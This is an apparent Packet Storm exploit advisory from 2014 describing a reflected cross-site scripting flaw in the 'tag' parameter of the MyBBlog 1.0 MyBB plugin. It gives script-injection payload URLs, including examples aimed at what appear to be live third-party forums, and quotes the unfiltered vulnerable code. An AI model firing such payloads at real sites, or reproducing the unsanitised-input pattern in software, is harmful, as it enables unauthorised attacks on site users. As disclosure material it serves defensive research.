MyBB MyBBlog 1.0 Cross Site Scripting

2014-10-24T00:00:00
ID PACKETSTORM:128839
Type packetstorm
Reporter DevilScreaM
Modified 2014-10-24T00:00:00

Description

                                        
                                            `#Title : MyBB MyBBlog 1.0 Plugin Cross Site Scripting  
  
#Author : DevilScreaM  
  
#Date : 24 October 2014  
  
#Category : Web Applications  
  
#Vendor : https://github.com/JN-Jones/MyBBlog  
  
#Download : http://community.mybb.com/mods.php?action=view&pid=221  
  
#Version : 1.0  
  
#Greetz : newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Madleets  
  
#Vulnerabillity : Cross Site Scripting  
  
  
Bug Location : mybblog.php parameter "tag"  
  
POC :  
  
http://127.0.0.1/mybblog.php?action=tag&tag=[XSS Injection]  
  
  
Example :  
  
http://liquidlemurlinux.org/forum/mybblog.php?action=tag&tag=<script>alert("DevilScreaM")</script>  
  
http://jobberguys.info/forum/mybblog.php?action=tag&tag=<script>alert("DevilScreaM")</script>  
  
===================================================================================  
  
Vulnerability at  
  
Location File :   
/inc/plugins/mybblog/modules/tag.php  
  
Code :  
  
add_breadcrumb($lang->sprintf($lang->mybblog_tags, $mybb->get_input("tag")), "mybblog.php?action=tag&tag={$mybb->get_input('tag')}");  
  
$articles = Article::getByTag($mybb->get_input("tag"));  
  
Nothing Filtering HTML  
  
`